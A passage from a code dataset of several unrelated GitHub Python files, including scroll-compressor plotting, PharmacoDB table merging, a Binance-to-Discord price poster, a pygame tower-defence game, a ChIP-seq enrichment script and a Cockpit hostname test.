betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta)\n ybeta = ybeta_offset\n \n xoffset = 
xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n xoffset_slot = ybeta_offset*sin(beta) # xbeta offset is zero\n yoffset_slot = -ybeta_offset*cos(beta) # ybeta_offset is zero\n \n # The slot\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset_slot, y+yoffset_slot, 'yellow', alpha = 0.5)[0])\n \n # The key\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset, y+yoffset, 'k')[0])\n \n if self.LayerOrbitingScroll.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n OSkeys = [dict(r = rring, width = wkey, length = lkey),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi)]\n FSkeys = [dict(r = rring, width = wkey, length = lkey),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi)]\n \n for key in OSkeys:\n r = key['r']\n width = key['width']\n length = key['length']\n betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus + pi/2\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta)\n ybeta = 0 \n \n xoffset = xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta+pi/2)\n self.orbiting_layers.append(self.ax.fill(x+xo,y+yo,'green', alpha = 0.5)[0])\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset,y+yoffset,'k')[0])\n \n self.ax.set_autoscale_on(True)\n \n def remove_orbiting_layers(self):\n #Clean out all the items from the orbiting layers\n for item in self.orbiting_layers:\n item.remove() # Remove from the GUI\n self.orbiting_layers = []\n \n def start(self):\n \"\"\"\n Start the plotting machinery\n \"\"\"\n self.PT=PlotThread()\n self.PT.setDaemon(True)\n self.PT.setGUI(self) #pass it an instance of the frame (by reference)\n self.PT.setInterval(0.05) #delay between plot events\n self.PT.start()\n \n def onButton(self, event):\n \"\"\"\n Runs the thread\n \"\"\"\n btn = event.GetEventObject()\n if btn.GetValue()==True:\n btn.SetLabel(\"Stop\")\n else:\n btn.SetLabel(\"Start\")\n \n def updateDisplay(self):\n wx.CallAfter(self._updateDisplay)\n \n def _updateDisplay(self):\n \"\"\"\n Updates the animation\n \"\"\"\n if self.Animate==True:\n wx.CallAfter(self.plotStep)\n self.plotThread=threading.Timer(0.001, self.updateDisplay)\n self.plotThread.daemon=True\n self.plotThread.start()\n\n def plotStep(self):\n \n self.remove_orbiting_layers()\n \n self.theta += 2*np.pi/(self.N-1)\n \n # Plot the orbiting layers\n self.apply_orbiting_layers(self.theta)\n \n #If offset scroll, don't shave the orbiting scroll \n (x,y)=CoordsOrbScroll(self.theta,\n self.geo,\n shaveOn = self.geo.phi_ie_offset < 1e-12\n )\n \n #Create the data for the orbiting scroll\n self.OS.set_xy(np.hstack((x,y)))\n self.ax.figure.canvas.draw() #Annoyingly this draw is required to flush the ghost orbiting scroll\n self.SetTitle('theta = '+str(self.theta)+' radians')\n \n if self.writing_animation:\n if not hasattr(self,'frame_counter_start'):\n self.frame_counter = self.frame_counter_start = 0\n fName = 'frame_{i:04d}.png'.format(i=self.frame_counter)\n self.ax.figure.savefig(fName)\n print('saving', fName)\n self.frame_counter += 1\n if self.frame_counter == self.N-1:\n 
self.OnDoneSavingAnimation()\n\n def preClose(self,event):\n \"\"\"\n This runs at the beginning of the closing event to deal with cleanup\n of threads and the GUI\n \"\"\"\n self.PT.shutdown()\n self.Destroy()\n\nif __name__== \"__main__\":\n \n from PDSim.scroll.core import Scroll\n \n ScrollComp = Scroll()\n ScrollComp.set_scroll_geo(83e-6, 3.3, 0.005, 0.006) #Set the scroll wrap geometry\n ScrollComp.set_disc_geo('2Arc',r2 = 0)\n ScrollComp.geo.phi_ie_offset = 0\n \n app = wx.App()\n frame = ScrollAnimForm(ScrollComp.geo)\n frame.Show()\n app.MainLoop()\n \n \n\n \n# pylab.fill(x,y)\n# pylab.show()\n## pylab.show()\n pass\n \n","repo_name":"ibell/pdsim","sub_path":"PDSim/scroll/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":45735,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"19071605642","text":"import itertools\n\n\ndef square_laminae(n):\n max_side = n // 4 + 1\n\n count = 0\n for side in range(3, max_side + 1):\n squares_used = side * 4 + 4\n count += 1\n for layer in itertools.count(1):\n layer_side = side - layer * 2\n if layer_side < 1:\n break\n squares_used += layer_side * 4 + 4\n if squares_used > n:\n break\n count += 1\n\n return count\n\n\nprint(square_laminae(1000000))\n","repo_name":"simonolander/euler","sub_path":"euler-173.py","file_name":"euler-173.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34878868868","text":"import glob\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\nfrom datatable import dt, fread, iread, join, by, rbind, cbind, f\n\n\ndef combine_all_pset_tables(data_dir, output_dir):\n \"\"\"\n Combine all PSet tables into the final PharmacoDB tables.\n\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] A dictionary of all some of the\n final tables, with names as keys, to be used for later joins\n \"\"\"\n print(\"Combining all PSet tables...\")\n join_dfs = combine_primary_tables(data_dir, output_dir)\n join_dfs = combine_secondary_tables(data_dir, output_dir, join_dfs)\n join_dfs = combine_experiment_tables(data_dir, output_dir, join_dfs)\n return join_dfs\n\n\ndef combine_primary_tables(data_dir, output_dir):\n \"\"\"\n Build all the primary tables, i.e., tables that require no joins,\n and return them in a dictionary.\n\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] A dictionary of all the primary\n tables, with names as keys\n \"\"\"\n # Load, concatenate, and write primary tables to disk\n tissue_df = load_join_write('tissue', data_dir, output_dir)\n drug_df = load_join_write('drug', data_dir, output_dir)\n gene_df = load_join_write('gene', data_dir, output_dir)\n dataset_df = load_join_write('dataset', data_dir, output_dir)\n\n # Transform tables to be used for joins\n dfs = {}\n dfs['tissue'] = rename_and_key(tissue_df, 'tissue_id')\n dfs['drug'] = rename_and_key(drug_df, 'drug_id')\n dfs['gene'] = rename_and_key(gene_df, 'gene_id')\n dfs['dataset'] = rename_and_key(dataset_df, 'dataset_id')\n return dfs\n\n\ndef combine_secondary_tables(data_dir, output_dir, join_dfs):\n \"\"\"\n Build all secondary tables, i.e., all tables that have foreign keys corresponding\n to primary 
keys of primary tables. The function reads PSet tables from \n data_dir, concatenates and joins them with tables from join_dfs, and \n writes them to output_dir.\n\n @param join_dfs: [`dict(string: datatable.Frame)`] A dictionary of all the primary\n tables, with names as keys\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] The updated dictionary of join tables\n \"\"\"\n # Build cell table and add to join_dfs dictionary\n cell_df = load_join_write(\n 'cell', data_dir, output_dir, ['tissue'], join_dfs)\n join_dfs['cell'] = rename_and_key(cell_df, 'cell_id')\n\n # Build drug annotation table\n load_join_write('drug_annotation', data_dir,\n output_dir, ['drug'], join_dfs, add_index=False)\n # Build gene annotation table\n gene_annot_df = load_table('gene_annotation', data_dir)\n # Remove any rows with no actual annotations (no symbol)\n gene_annot_df = gene_annot_df[dt.f.symbol > \"\", :]\n # Join the other way so that genes that got cut out are included back in\n gene_annot_df.key = 'gene_id'\n gene_annot_df = join_tables(join_dfs['gene'], gene_annot_df, 'gene_id')\n write_table(gene_annot_df, 'gene_annotation', output_dir, add_index=False)\n\n # Build join tables\n load_join_write('dataset_cell', data_dir, output_dir,\n ['dataset', 'cell'], join_dfs, add_index=False)\n load_join_write('dataset_tissue', data_dir, output_dir,\n ['dataset', 'tissue'], join_dfs, add_index=False)\n # TODO: temporary workaround for dataset_compound until we standardize drug -> compound\n dataset_compound_df = load_table('dataset_compound', data_dir)\n dataset_compound_df = join_tables(\n dataset_compound_df, join_dfs['dataset'], 'dataset_id')\n compound_df = join_dfs['drug'].copy()\n compound_df.names = {'drug_id': 'compound_id'}\n dataset_compound_df = join_tables(\n dataset_compound_df, compound_df, 'compound_id')\n dataset_compound_df = write_table(\n dataset_compound_df, 'dataset_compound', output_dir, add_index=False)\n\n # Build all other secondary tables\n load_join_write('mol_cell', data_dir, output_dir,\n ['cell', 'dataset'], join_dfs)\n # mol_cells has Kallisto. not sure why. from CTRPv2 (TODO)\n load_join_write('dataset_statistics', data_dir,\n output_dir, ['dataset'], join_dfs)\n load_join_write('gene_drug', data_dir, output_dir, [\n 'gene', 'drug', 'dataset', 'tissue'], join_dfs)\n\n return join_dfs\n\n\ndef combine_experiment_tables(data_dir, output_dir, join_dfs):\n \"\"\"\n Load and process experiment table, then use it to build the dose response\n and profile tables. 
Drop the 'name' column from the experiment table before\n writing to a CSV.\n\n @param join_dfs: [`dict(string: datatable.Frame)`]\n @param data_dir: [`string`] The file path to the PSet tables\n @param output_dir: [`string`] The file path to the final tables\n @return: [`None`]\n \"\"\"\n # Load all experiments from PSets\n experiment_df = load_join_write('experiment', data_dir, output_dir, [\n 'cell', 'drug', 'dataset', 'tissue'], join_dfs)\n # Don't write the 'name' column\n experiment_df[:, ['id', 'cell_id', 'drug_id', 'dataset_id', 'tissue_id']].to_csv(\n os.path.join(output_dir, 'experiment.csv'))\n\n # Rename columns and key experiment table based on experiment name and dataset id\n experiment_df.names = {'name': 'experiment_id'}\n experiment_df = experiment_df[:, ['id', 'experiment_id', 'dataset_id']]\n experiment_df.key = ('dataset_id', 'experiment_id')\n join_dfs['experiment'] = experiment_df\n\n # Nearly the same code as in load_join_write but has special case handling\n for df_name in ['dose_response', 'profile']:\n df = load_table(df_name, data_dir)\n for fk in ['dataset', 'experiment']:\n df = join_tables(df, join_dfs[fk], fk+'_id')\n del df[:, 'dataset_id']\n write_table(df, df_name, output_dir,\n add_index=(df_name == 'dose_response'))\n\n return join_dfs\n\n\ndef load_join_write(name, data_dir, output_dir, foreign_keys=[], join_dfs=None, add_index=True):\n \"\"\"\n Given the name of a table, load all PSet tables of that name from data_dir,\n join them to any foreign key tables (specified by foreign_keys), and write\n the final combined and joined table to output_dir as a CSV.\n\n @param name: [`string`] The name of the table\n @param data_dir: [`string`] File path to the directory with all PSet tables\n @param output_dir: [`string`] The file path to the final tables\n @param foreign_keys: [`list(string)`] An optional list of tables that this table\n needs to be joined with\n @param join_dfs: [`dict(string: datatable.Frame)`] An optional dictionary of join\n tables (for building out foreign keys); keys are table names\n @param add_index: [`bool`] Indicates whether or not to add a primary key (1-nrows)\n when writing the final table to a .csv\n @return: [`datatable.Frame`] The final combined and joined table\n \"\"\"\n df = load_table(name, data_dir)\n if foreign_keys and join_dfs is None:\n raise TypeError(f'The {name} table has foreign keys {foreign_keys} '\n 'but you have not passed any join tables.')\n\n for fk in foreign_keys:\n df = join_tables(df, join_dfs[fk], fk+'_id')\n\n df = write_table(df, name, output_dir, add_index)\n return df\n\n\ndef load_table(name, data_dir):\n \"\"\"\n Load all PSet tables with name into a datatable, dropping any duplicate rows.\n\n @param name: [`string`] The name of the table\n @param data_dir: [`string`] File path to the directory with all PSet tables\n @return: [`datatable.Frame`] A datatable containing all rows from all PSets\n \"\"\"\n # Get all files\n files = glob.glob(os.path.join(data_dir, '**', f'*{name}.csv'))\n # Filter so that file path are '{data_dir}/{pset}/{pset}_{name}.csv'\n files = [file_name for file_name in files if re.search(\n data_dir + r'/(\\w+)/\\1_' + name + '.csv$', file_name)]\n # Read and concatenate tables\n df = rbind(*iread(files, sep=','))\n # Replace any empty strings with None/NA\n df.replace(\"\", None)\n # Drop duplicates\n # (groups by all columns and selects only the first row from each group)\n df = df[0, :, by(df.names)]\n\n return df\n\n\ndef rename_and_key(df, join_col, og_col='name'):\n 
\"\"\"\n Prepare df to be joined with other tables by renaming the column\n on which it will be joined and by keying it.\n\n @param df: [`datatable.Frame`] The table to be keyed.\n @param join_col: [`string`] The name of the join column in other tables\n (ex. 'tissue_id', 'cell_id', etc.)\n @param og_col: [`string`] The name of the join column in the join table\n @return: [`datatable.Frame`] The keyed and renamed table\n \"\"\"\n # Rename primary key to match foreign key name (necessary for joins)\n df.names = {og_col: join_col}\n # Only select necessary rows\n df = df[:, ['id', join_col]]\n # Set the key\n df.key = join_col\n return df # Not necessary? df passed by reference\n\n\ndef join_tables(df1, df2, join_col):\n \"\"\"\n Join df2 and df1 based on join_col (left outer join by default).\n\n @param df1: [`datatable.Frame`] The datatable with the foreign key\n @param df2: [`datatable.Frame`] The join table (ex. tissue datatable)\n @param join_col: [`string`] The name of the columns on which the tables\n will be joined (ex. 'tissue_id')\n @return [`datatable.Frame`] The new, joined table\n \"\"\"\n if (join_col not in df1.names) or (join_col not in df2.names):\n print(f'{join_col} is missing from one or both of the datatables passed!',\n 'Make sure you have prepared df2 using rename_and_key().')\n return None\n\n # Join tables, then rename the join col and drop it\n df = df1[:, :, join(df2)]\n df.names = {join_col: 'drop', 'id': join_col}\n del df[:, 'drop']\n return df\n\n\ndef write_table(df, name, output_dir, add_index=True):\n \"\"\"\n Add a primary key to df ('id' column) and write it to output_dir\n as a .csv file.\n\n @param df: [`datatable.Frame`] A PharmacoDB table\n @param name: [`string`] The name of the table\n @param output_dir: [`string`] The directory to write the table to\n @return: [`datatable.Frame`] The indexed PharmacoDB table\n \"\"\"\n print(f'Writing {name} table to {output_dir}...')\n if add_index:\n # Index datatable\n df = cbind(dt.Frame(id=np.arange(df.nrows) + 1), df)\n # Write to .csv\n df.to_csv(os.path.join(output_dir, f'{name}.csv'))\n return df\n","repo_name":"bhklab/DataIngestion","sub_path":"PharmacoDI/PharmacoDI/combine_pset_tables.py","file_name":"combine_pset_tables.py","file_ext":"py","file_size_in_byte":11033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6955337226","text":"import unittest\n\nimport os\nfrom gif_me_hd.parse import *\nfrom gif_me_hd.encode import *\nfrom lzw_gif_cpp import compress\n\nDATASET = './dataset/'\n\n\nclass EncoderTester(unittest.TestCase):\n def setUp(self):\n self.filenames = os.listdir(DATASET)\n self.actual_path = [os.path.join(DATASET, x) for x in self.filenames]\n self.gifs = [GifReader(x).parse() for x in self.actual_path]\n\n def test_saved_reparsed_gif(self):\n # Test case 1+2\n # Save the GIF files\n test_dir = 'output/'\n os.makedirs(test_dir,exist_ok=True)\n for index, gif in enumerate(self.gifs):\n encoder = GifEncoder(os.path.join(\n test_dir, f'encoded_{self.filenames[index]}'))\n encoder.encode(gif, compress)\n encoder.to_file()\n # Reparse the saved files\n self.parsed_gifs = [GifReader(os.path.join(\n test_dir, f'encoded_{filename}')).parse() for filename in self.filenames]\n \n # Re-save parsed\n for index, gif in enumerate(self.parsed_gifs):\n encoder = GifEncoder(os.path.join(\n test_dir, f're-encoded_{self.filenames[index]}'))\n encoder.encode(gif, compress)\n encoder.to_file()\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"GIF-ME-HD/gif_me_hd_proto","sub_path":"tests/test_encoder.py","file_name":"test_encoder.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1077924125","text":"from binance.client import Client\nfrom time import sleep\nfrom discord_webhook import DiscordWebhook\nimport requests\n\nAPI_KEY = ''\nSECRET_KEY = ''\n\nclient = Client(API_KEY, SECRET_KEY)\n \ndef live_price():\n    price = client.get_symbol_ticker(symbol='BTCUSDT')\n    print(f\"Live price: {'BTCUSDT'}: {price['price']}\")\n    webhook_url = 'webhook url'\n    # Build the message\n    message = f\"{'BTCUSDT'} price is {price['price']} USDT\"\n    # Post it to the webhook\n    requests.post(webhook_url, data={\"content\": message})\n\n\nwhile True:\n    price = client.get_symbol_ticker(symbol='BTCUSDT')\n    live_price()\n    sleep(1000)\n","repo_name":"kaanguler4/Discord-Webhook-Bitcoin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25824901752","text":"import logging\n\nfrom novaclient.v1_1 import client as nova_client\n\nimport savanna.utils.openstack.base as base\n\n\ndef novaclient(headers):\n    username = headers['X-User-Name']\n    token = headers['X-Auth-Token']\n    tenant = headers['X-Tenant-Id']\n    compute_url = base.url_for(headers, 'compute')\n\n    logging.debug('novaclient connection created using token '\n                  '\"%s\", tenant \"%s\" and url \"%s\"',\n                  token, tenant, compute_url)\n\n    nova = nova_client.Client(username, token, tenant,\n                              auth_url=compute_url)\n\n    nova.client.auth_token = token\n    nova.client.management_url = compute_url\n\n    return nova\n\n\ndef get_flavors(headers):\n    flavors = [flavor.name for flavor\n               in novaclient(headers).flavors.list()]\n    return flavors\n\n\ndef get_flavor(headers, **kwargs):\n    return novaclient(headers).flavors.find(**kwargs)\n\n\ndef get_images(headers):\n    images = [image.id for image\n              in novaclient(headers).images.list()]\n    return images\n\n\ndef get_limits(headers):\n    limits = novaclient(headers).limits.get().absolute\n    return dict((l.name, l.value) for l in limits)\n","repo_name":"darionyaphets/savanna","sub_path":"savanna/utils/openstack/nova.py","file_name":"nova.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3432607467","text":"import pygame\nimport sys\n\nfrom settings import *\nfrom level import Level\nfrom menu import Menu, Button\nfrom ui import UI\nfrom debug import debug\nfrom game_data import turrets_data\n\n\nclass Game:\n    def __init__(self):\n        self.coins_amount = 100\n        self.life = 5\n        self.turret_selected = 1\n\n        self.status = 'menu'\n        self.start_menu = Menu(screen,\n                               \"Tower Defence\",\n                               [\n                                   Button(screen,\n                                          self.create_level, \"Start\", 200, 50),\n                                   Button(screen,\n                                          self.create_level, \"Settings\", 200, 50),\n                                   Button(screen,\n                                          self.quit_game, \"Quit\", 200, 50)\n                               ])\n\n        self.level = Level(screen, self.turret_selected, self.change_turret_selected, self.coins_amount,\n                           self.change_coins, self.change_life)\n\n        # User interface\n        self.ui = UI(screen, self.quit_game,\n                     self.create_menu)\n\n    def quit_game(self):\n        pygame.quit()\n        sys.exit()\n\n    def change_coins(self, amount):\n        self.coins_amount += amount\n\n    def change_life(self, amount):\n        self.life += amount\n\n    def change_turret_selected(self, choice):\n        
self.turret_selected = choice\n for turret_type in turrets_data:\n turrets_data[turret_type]['is_selected'] = False\n turrets_data[f\"0{self.turret_selected}\"]['is_selected'] = True\n\n def create_menu(self):\n self.start_menu = Menu(screen,\n \"Tower Defence\",\n [\n Button(screen,\n self.create_level, \"Start\", 200, 50),\n Button(screen,\n self.create_level, \"Settings\", 200, 50),\n Button(screen,\n self.quit_game, \"Quit\", 200, 50)\n ],\n \"graphics/ui/start_menu_banner.png\",)\n self.status = 'menu'\n\n def create_level(self):\n self.level = Level(screen, self.turret_selected, self.change_turret_selected, self.coins_amount,\n self.change_coins, self.change_life)\n self.status = 'level'\n\n def create_game_over_menu(self):\n self.game_over_menu = Menu(screen,\n \"Game Over\",\n [\n Button(screen,\n self.create_level, \"Restart\", 200, 50),\n Button(screen,\n self.create_menu, \"Go to home\", 200, 50),\n Button(screen,\n self.quit_game, \"Quit\", 200, 50)\n ])\n self.status = 'game_over_menu'\n\n def run(self):\n if self.status == 'menu':\n self.start_menu.run()\n elif self.status == 'game_over_menu':\n self.game_over_menu.run()\n else:\n self.level.run()\n self.ui.show()\n self.ui.show_coins(self.coins_amount)\n self.ui.show_life(self.life)\n self.ui.draw_turret_panel(self.change_turret_selected)\n # self.ui.draw_wave_timer(20)\n\n if self.life <= 0:\n self.create_game_over_menu()\n\n\n# Setup level\npygame.mixer.pre_init(44100, -16, 2, 512)\npygame.init()\n\n# pygame.mixer.music.load('sound/music.wav')\n# pygame.mixer.music.play(-1)\n\nscreen = pygame.display.set_mode(\n (screen_width, screen_height), pygame.SCALED + pygame.RESIZABLE)\npygame.display.set_caption(\"Tower Defence\")\nclock = pygame.time.Clock()\ngame = Game()\n\n# Game loop\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill('black')\n game.run()\n\n debug(pygame.mouse.get_pos(), 70)\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"Instelce/TowerDefence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42903370212","text":"###########################################################################\n# Python (v3.8.5) script enrichment.py (v1.0) to calculate enrichments\n# Last update: 2022_06_07\n# Author: Michelle Almeida da Paz\n###########################################################################\n\n#!/usr/bin/env python\n\nimport math\nimport argparse\nimport os\nimport sys\n\nparser = argparse.ArgumentParser(description='T3E: Enrichment')\nparser.add_argument('--version', action='version', version='%(prog)s 1.0')\nparser.add_argument('--background', action='store', metavar = 'background', help='background file created by T3E [Example: sample001_background.txt]')\nparser.add_argument('--signal', action='store', metavar = 'signal', help='ChIP-seq sample experiment counts [.txt format]')\nparser.add_argument('--iter', action='store', metavar = 'iter', help='number of interations [Example: 100]')\nparser.add_argument('--alpha', action='store', metavar = 'alpha', help='level of significance to report enrichment [Example: 0.05]')\nparser.add_argument('--enrichment', action='store', metavar = 'enrichment', help='log2FC threshold to report enrichment [Example: 1.0]')\nparser.add_argument('--outputfolder', action='store', metavar = 'outputfolder', help='output folder path [Example: 
/results]')\nparser.add_argument('--outputprefix', action='store', metavar = 'outputprefix', help='prefix name of your analysis [Example: sample001]')\nargs = parser.parse_args()\n\nif (len(sys.argv) == 1):\n\tparser.print_help()\n\tparser.exit()\n\nbackground = args.background\nsignal = args.signal\nnum_iter = int(args.iter)\nalpha = float(args.alpha)\nenrichment = float(args.enrichment)\noutputprefix = args.outputprefix\noutput = args.outputfolder + os.path.sep + outputprefix + '_enrichment.txt'\n\ndef open_signal(sample):\n\twith open(sample, \"r\") as s:\n\t\tfor line in s:\n\t\t\tline = line.rstrip()\n\t\t\t(repeat, counts) = line.split(\"\\t\")\n\t\t\trepeats_counts[repeat] = counts\n\t\t\tqt[repeat] = 0\n\t\t\tsum_backg[repeat] = 0\n\treturn repeats_counts\n\t\ndef open_iterations(iterations):\n\twith open(iterations, \"r\") as i:\n\t\tfor line in i:\n\t\t\tline = line.rstrip()\n\t\t\t(iterate, repeat, counts) = line.split(\"\\t\")\n\t\t\tif repeat in repeats_counts:\n\t\t\t\tif (float(counts) > float(repeats_counts[repeat])):\n\t\t\t\t\tqt[repeat] += 1\n\t\t\t\tsum_backg[repeat] += float(counts)\n\treturn qt, sum_backg\n\nrepeats_counts = {}\nqt = {}\nsum_backg = {}\nrepeats_counts = open_signal(signal)\n\nqt, sum_backg = open_iterations(background)\n\nwith open(output, \"w\") as o:\n\tfor repeat in sum_backg.keys():\n\t\tpvalue = qt[repeat]/num_iter\n\t\tmean = sum_backg[repeat]/num_iter\n\t\tif (mean > 0):\n\t\t\tfoldchange = float(repeats_counts[repeat])/mean\n\t\t\tlog2fc = math.log(foldchange,2)\n\t\t\tif ((pvalue <= alpha) and (log2fc >= enrichment)):\n\t\t\t\tprint(repeat, pvalue, log2fc)\n\t\t\tprint(repeat, \"\\t\", pvalue, \"\\t\", log2fc, file=o)\n","repo_name":"michelleapaz/T3E","sub_path":"scripts/enrichment.py","file_name":"enrichment.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"10663564094","text":"def heapify(arr, n, i):\n largest = i # i is the node to heapify down\n l = 2 * i + 1 # left\n r = 2 * i + 2 # right\n if l < n and arr[i] < arr[l]:\n largest = l\n if r < n and arr[largest] < arr[r]:\n largest = r\n if largest != i: # do heapify down\n arr[i], arr[largest] = arr[largest], arr[i]\n heapify(arr, n, largest)\n\ndef heapSort(arr):\n n = len(arr)\n # Build a max heap\n for i in range(n//2-1, -1, -1): # last parent is n//2-1\n heapify(arr, n, i) # heapify every node\n # One by one extract elements\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i] # swap root to end of unsorted part of arr\n heapify(arr, i, 0) # heapify root\n","repo_name":"megwu1129/Leetcode","sub_path":"L7-Heapsort.py","file_name":"L7-Heapsort.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"39730205765","text":"import sys\nimport os\nimport re\nf = re.compile(\".*/avocado-cockpit\")\nsys.path.append(f.findall(os.path.abspath(\n os.path.abspath(os.path.dirname(__file__))))[0])\nimport time\nfrom avocado import Test\nfrom avocado import main\nfrom libs import general\n\n\nclass TestHostname(Test):\n \"\"\"\n : avocado: enable\n \"\"\"\n default_params = {'timeout': 30}\n\n def setUp(self):\n self.pretty_name = self.params.get('pretty')\n self.real_name = self.params.get('real')\n self.ipaddr = self.params.get('ipaddr')\n self.port = self.params.get('port')\n self.testurl = \"http://%s:%s\" % (self.ipaddr, self.port)\n self.username = self.params.get('name', 
\"/*/user1/\")\n self.passwd = self.params.get('passwd', \"/*/user1/\")\n web_driver_obj = general.LoginCockpit(\n self.ipaddr, self.username, self.passwd, self.port)\n self.web_driver = web_driver_obj.run()\n self.ssh_conn_obj = general.EstabSSHConnect(self.ipaddr, self.username, self.passwd)\n\n def display_hostname_in_cockpit(self):\n web_driver = self.web_driver\n web_driver.switch_to.parent_frame()\n web_driver.implicitly_wait(10)\n time.sleep(1)\n web_driver.switch_to.frame(\"cockpit1:localhost/system\")\n display_hostname = web_driver.find_element_by_id(\n \"system_information_hostname_button\").text\n return display_hostname\n\n def _test_default_hostname(self):\n display_hostname = self.display_hostname_in_cockpit()\n self.log.info(\"The hostname shown in cockpit page is: %s\" % display_hostname)\n current_hostname = self.ssh_conn_obj.get_hostname()\n if display_hostname.strip() == current_hostname.strip():\n self.log.info(\"The hostname shown in cockpit page[%s] is the same as system[%s]!\" % (display_hostname, current_hostname))\n result = 0\n else:\n self.log.error(\"The hostname shown in cockpit page[%s] is not the same as system[%s]!\" % (display_hostname, current_hostname))\n result = 1\n return result\n\n\n def change_hostname(self):\n web_driver = self.web_driver\n web_driver.implicitly_wait(10)\n web_driver.switch_to.parent_frame()\n web_driver.switch_to_frame(\"cockpit1:localhost/system\")\n web_driver.implicitly_wait(10)\n web_driver.find_element_by_id(\"system_information_hostname_button\").click()\n web_driver.find_element_by_id(\"sich-pretty-hostname\").clear()\n web_driver.find_element_by_id(\"sich-pretty-hostname\").send_keys(self.pretty_name)\n web_driver.find_element_by_id(\"sich-hostname\").clear()\n web_driver.find_element_by_id(\"sich-hostname\").send_keys(self.real_name)\n web_driver.find_element_by_id(\"sich-apply-button\").click()\n\n def check_hostname_after_change(self):\n display_hostname = self.display_hostname_in_cockpit()\n self.log.info(\"The hostname shown in cockpit page is: %s\" % display_hostname)\n current_hostname = self.ssh_conn_obj.get_hostname()\n self.log.info(\"The hostname in system is: %s\" % current_hostname)\n aimed_hostname = \"%s (%s)\" % (self.pretty_name, self.real_name)\n result = 0\n if current_hostname == aimed_hostname:\n self.log.info(\"Setup hostname in system succeed!\")\n self.log.info(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.info(\"Actually hostname in system is: %s\" % current_hostname)\n result += 0\n else:\n self.log.error(\"Setup hostname in cockpit failed!\")\n self.log.error(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.error(\"Actually hostname in system is: %s\" % current_hostname)\n result += 1\n\n if display_hostname == aimed_hostname:\n result += 0\n self.log.info(\"Cockpit display the right hostname as setup!\")\n self.log.info(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.info(\"Actually hostname in system is: %s\" % display_hostname)\n else:\n self.log.error(\"Cockpit display the hostname different from setup!\")\n self.log.error(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.error(\"Cockpit display the hostname is: %s\" % display_hostname)\n result += 1\n return result\n\n def _test_change_hostname_in_cockpit(self):\n self.change_hostname()\n result = self.check_hostname_after_change()\n return result\n\n def test(self):\n t_result = self._test_default_hostname()\n t_result += self._test_change_hostname_in_cockpit()\n self.assertEqual(0, t_result, 'Hostname test 
